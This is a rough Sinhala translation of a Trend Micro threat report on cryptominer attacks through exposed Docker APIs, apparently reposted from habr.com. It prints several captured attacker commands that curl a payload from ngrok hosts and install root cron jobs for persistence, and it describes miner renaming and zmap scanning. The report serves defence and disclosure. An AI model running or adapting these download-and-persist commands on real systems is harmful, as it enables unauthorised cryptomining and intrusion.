තර්ජන හඹා යෑම සඳහා අප විසින් නිර්මාණය කරන ලද හනිපොට් බහාලුම් භාවිතයෙන් එකතු කරන ලද දත්ත අපි විශ්ලේෂණය කළෙමු. තවද අපි Docker Hub හි ප්රජා-ප්රකාශිත රූපයක් භාවිතයෙන් හොර බහාලුම් ලෙස යොදවා ඇති අනවශ්ය හෝ අනවසර ගුප්ත ව්යවහාර මුදල් පතල්කරුවන්ගෙන් සැලකිය යුතු ක්රියාකාරකම් අනාවරණය කර ගත්තෙමු. රූපය අනිෂ්ට cryptocurrency පතල්කරුවන් ලබා දෙන සේවාවක කොටසක් ලෙස භාවිතා වේ.
මීට අමතරව, විවෘත අසල්වැසි බහාලුම් සහ යෙදුම් වලට විනිවිද යාමට ජාල සමඟ වැඩ කිරීම සඳහා වැඩසටහන් ස්ථාපනය කර ඇත.
අපි අපගේ Honeypots එලෙසම තබමු, එනම් පෙරනිමි සැකසුම් සමඟ, කිසිදු ආරක්ෂක පියවරක් හෝ පසුව අමතර මෘදුකාංග ස්ථාපනය නොකරමු. දෝෂ සහ සරල දුර්වලතා මඟහරවා ගැනීම සඳහා මූලික සැකසුම සඳහා Docker සතුව නිර්දේශ ඇති බව කරුණාවෙන් සලකන්න. නමුත් භාවිතා කරන Honeypots බහාලුම් වේ, බහාලුම් වේදිකාවට එල්ල කරන ප්රහාර හඳුනා ගැනීමට නිර්මාණය කර ඇත, බහාලුම් තුළ ඇති යෙදුම් නොවේ.
අනාවරණය කරගත් ද්වේශසහගත ක්රියාකාරකම ද සැලකිය යුතු වන්නේ එයට දුර්වලතා අවශ්ය නොවන නිසා සහ ඩොකර් අනුවාදයෙන් ස්වාධීන වන බැවිනි. වැරදි ලෙස වින්යාස කර ඇති සහ එම නිසා විවෘත බහාලුම් රූපයක් සොයා ගැනීම ප්රහාරකයන්ට බොහෝ විවෘත සේවාදායකයන් ආසාදනය කිරීමට අවශ්ය වේ.
වසා නොගත් Docker API මඟින් පරිශීලකයාට පුළුල් පරාසයක ක්රියා කිරීමට ඉඩ සලසයි
වම් පසින් ඇත්තේ අනිෂ්ට මෘදුකාංග බෙදා හැරීමේ ක්රමයයි. දකුණු පසින් ප්රහාරකයාගේ පරිසරය ඇත, එමඟින් පින්තූර දුරස්ථව පෙරළීමට ඉඩ සලසයි.
විවෘත Docker API 3762 රට අනුව බෙදා හැරීම. 12.02.2019/XNUMX/XNUMX දිනැති ෂෝඩාන් සෙවීම මත පදනම්ව
ප්රහාර දාම සහ ගෙවීමේ විකල්ප
ද්වේෂසහගත ක්රියාකාරකම් අනාවරණය කර ගත්තේ හනිපොට් ආධාරයෙන් පමණක් නොවේ. Monero cryptocurrency පතල් මෘදුකාංග යෙදවීමට පාලමක් ලෙස වැරදි ලෙස වින්යාස කළ බහාලුමක් විමර්ශනය කිරීමෙන් පසු නිරාවරණය වූ Docker API ගණන (දෙවන ප්රස්ථාරය බලන්න) වැඩි වී ඇති බව Shodan වෙතින් දත්ත පෙන්නුම් කරයි. පසුගිය වසරේ ඔක්තෝම්බර් මාසයේදී (2018, වත්මන් දත්ත
හනිපොට් ලඝු පරීක්ෂාවකින් පෙනී ගියේ බහාලුම් රූප භාවිතය ද භාවිතය සමඟ සම්බන්ධ වී ඇති බවයි
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
ඔබට පෙනෙන පරිදි, උඩුගත කරන ලද ගොනු නිරන්තරයෙන් වෙනස් වන URL වලින් බාගත කර ඇත. මෙම URL වල කෙටි කල් ඉකුත් වීමේ දිනයක් ඇත, එබැවින් කල් ඉකුත් වූ දිනට පසුව ගෙවීම් බාගත කළ නොහැක.
ගෙවීමේ විකල්ප දෙකක් තිබේ. පළමුවැන්න Linux සඳහා සම්පාදනය කරන ලද ELF miner (Coinminer.SH.MALXMR.ATNO ලෙස අර්ථ දක්වා ඇත) එය පතල් තටාකයට සම්බන්ධ කරයි. දෙවැන්න ජාල පරාසයන් පරිලෝකනය කිරීමට සහ නව ඉලක්ක සෙවීමට භාවිතා කරන ඇතැම් ජාල මෙවලම් ලබා ගැනීමට නිර්මාණය කර ඇති ස්ක්රිප්ට් (TrojanSpy.SH.ZNETMAP.A) වේ.
ඩ්රොපර් ස්ක්රිප්ට් විචල්ය දෙකක් සකසයි, පසුව ඒවා ගුප්තකේතන මුදල් පතල්කරු යෙදවීමට භාවිතා කරයි. HOST විචල්යයේ අනිෂ්ට ගොනු ඇති URL අඩංගු වන අතර RIP විචල්යය යනු යෙදවිය යුතු පතල්කරුගේ ගොනු නාමය (ඇත්ත වශයෙන්ම, හැෂ්) වේ. හැෂ් විචල්යය වෙනස් වන සෑම අවස්ථාවකම HOST විචල්යය වෙනස් වේ. ප්රහාරයට ලක් වූ සේවාදායකයේ වෙනත් කිසිදු cryptocurrency පතල්කරුවන් ක්රියාත්මක නොවන බව පරීක්ෂා කිරීමට ස්ක්රිප්ට් උත්සාහ කරයි.
HOST සහ RIP විචල්යවල උදාහරණ මෙන්ම වෙනත් පතල් කම්කරුවන් ක්රියාත්මක නොවන බව පරීක්ෂා කිරීමට භාවිතා කරන කේත කොටසකි.
පතල් කම්කරුවා ආරම්භ කිරීමට පෙර, එය nginx ලෙස නම් කර ඇත. මෙම ස්ක්රිප්ටයේ අනෙකුත් අනුවාද මගින් පතල් කම්කරුවා ලිනක්ස් පරිසරයන්හි පවතින වෙනත් නීත්යානුකූල සේවාවන් වෙත නැවත නම් කරයි. ධාවන ක්රියාවලි ලැයිස්තුවට එරෙහිව චෙක්පත් මඟ හැරීමට මෙය සාමාන්යයෙන් ප්රමාණවත් වේ.
සෙවුම් පිටපතෙහි විශේෂාංග ද ඇත. අවශ්ය මෙවලම් යෙදවීමට එය එකම URL සේවාව සමඟ ක්රියා කරයි. ඒවා අතර zmap ද්විමය වන අතර එය ජාල පරිලෝකනය කිරීමට සහ විවෘත වරායන් ලැයිස්තුවක් ලබා ගැනීමට භාවිතා කරයි. සොයාගත් සේවා සමඟ අන්තර් ක්රියා කිරීමට සහ සොයාගත් සේවාව පිළිබඳ අමතර තොරතුරු තීරණය කිරීමට (උදාහරණයක් ලෙස, එහි අනුවාදය) ඔවුන්ගෙන් බැනර් ලබා ගැනීමට භාවිතා කරන තවත් ද්විමයයක් ස්ක්රිප්ට් පූරණය කරයි.
ස්කෑන් කිරීම සඳහා ස්ක්රිප්ට් සමහර ජාල පරාසයන් පූර්ව-නිර්ණය කරයි, නමුත් මෙය ස්ක්රිප්ට් අනුවාදය මත රඳා පවතී. එය ස්කෑන් කිරීම ක්රියාත්මක කිරීමට පෙර සේවා වෙතින් ඉලක්ක වරායන් ද සකසයි - මෙම අවස්ථාවේදී, ඩොකර් -.
හැකි ඉලක්ක සොයාගත් විගස, බැනර් ස්වයංක්රීයව ඒවායින් ඉවත් කරනු ලැබේ. ස්ක්රිප්ටය සේවා, යෙදුම්, සංරචක හෝ උනන්දුවක් දක්වන වේදිකා මත පදනම්ව ඉලක්ක පෙරහන් කරයි: Redis, Jenkins, Drupal, MODX,
ප්රහාරක දෛශිකය යනු ඩොකර් රූපයක් වන අතර එය ඊළඟ කේත කොටස් දෙකෙහි දැකිය හැකිය.
ඉහළින් නීත්යානුකූල සේවාවක් ලෙස නැවත නම් කරන අතර පහළින් ජාල පරිලෝකනය කිරීමට zmap භාවිතා කරන ආකාරය ඇත.
ඉහළින් පූර්ව නිශ්චිත ජාල පරාසයන් ඇත, පහළින් ඩොකර් ඇතුළු සේවා සෙවීම සඳහා විශේෂිත වරායන් ඇත.
ඇල්පයින්-කර්ල් රූපය මිලියන 10 කට වඩා වැඩි වාර ගණනක් බාගත කර ඇති බව තිර රුව පෙන්වයි
විවිධ ප්රොටෝකෝල හරහා ගොනු මාරු කිරීම සඳහා සම්පත්-කාර්යක්ෂම CLI මෙවලමක් වන Alpine Linux සහ curl මත පදනම්ව, ඔබට ගොඩනගා ගත හැකිය.
මෙම රූපය (ඇල්පයින්-කර්ල්) අනිෂ්ට නොවන බව සැලකිල්ලට ගැනීම වැදගත්ය, නමුත් ඔබට ඉහත දැකිය හැකි පරිදි, එය අනිෂ්ට කාර්යයන් සිදු කිරීමට භාවිතා කළ හැකිය. සමාන ඩොකර් පින්තූර අනිෂ්ට ක්රියාකාරකම් සිදු කිරීමට ද භාවිතා කළ හැක. අපි ඩොකර් අමතා ඔවුන් සමඟ මෙම ගැටලුව සම්බන්ධයෙන් කටයුතු කළෙමු.
නිර්දේශ
මෙම ලිපියේ සාකච්ඡා කරන ලද සිදුවීම පහත සඳහන් නිර්දේශ ඇතුළුව ආරම්භයේ සිටම ආරක්ෂාව සැලකිල්ලට ගැනීමේ අවශ්යතාවය ඉස්මතු කරයි:
- පද්ධති පරිපාලකයින් සහ සංවර්ධකයින් සඳහා: සෑම දෙයක්ම නිශ්චිත සේවාදායකයකින් හෝ අභ්යන්තර ජාලයකින් ඉල්ලීම් පිළිගැනීමට පමණක් වින්යාස කර ඇති බව සහතික කර ගැනීමට ඔබේ API සැකසීම් නිතරම පරීක්ෂා කරන්න.
- අවම අයිතිවාසිකම් මූලධර්මය අනුගමනය කරන්න: බහාලුම් රූප අත්සන් කර සත්යාපනය කර ඇති බවට සහතික වන්න, තීරණාත්මක සංරචක වෙත ප්රවේශය සීමා කරන්න (බහාලුම් දියත් කිරීමේ සේවාව) සහ ජාල සම්බන්ධතා වෙත සංකේතනය එක් කරන්න.
- අනුගමනය කරන්න
නිර්දේශ සහ ආරක්ෂක යාන්ත්රණ සක්රීය කරන්න, උදා.ඩොකර් වෙතින් සහ ඉදි කර ඇතආරක්ෂක ලක්ෂණ . - කන්ටේනරය තුළ ක්රියාත්මක වන ක්රියාවලීන් පිළිබඳ අමතර තොරතුරු ලබා ගැනීමට ධාවන කාල සහ රූප ස්වයංක්රීයව පරිලෝකනය කිරීම භාවිතා කරන්න (උදාහරණයක් ලෙස, වංචා කිරීම හඳුනා ගැනීමට හෝ අවදානම් සෙවීමට). යෙදුම් පාලනය සහ අඛණ්ඩතාව අධීක්ෂණය සේවාදායක, ගොනු සහ පද්ධති ප්රදේශවල අසාමාන්ය වෙනස්කම් නිරීක්ෂණය කිරීමට උපකාරී වේ.
Trendmicro DevOps කණ්ඩායම්වලට ආරක්ෂිතව ගොඩනඟා ගැනීමට, ඉක්මනින් ඉදිරියට යාමට සහ ඕනෑම තැනක දියත් කිරීමට උදවු කරයි. Trend Micro
සම්මුතියේ සලකුණු
අදාළ හැෂ්:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
මත
මූලාශ්රය: www.habr.com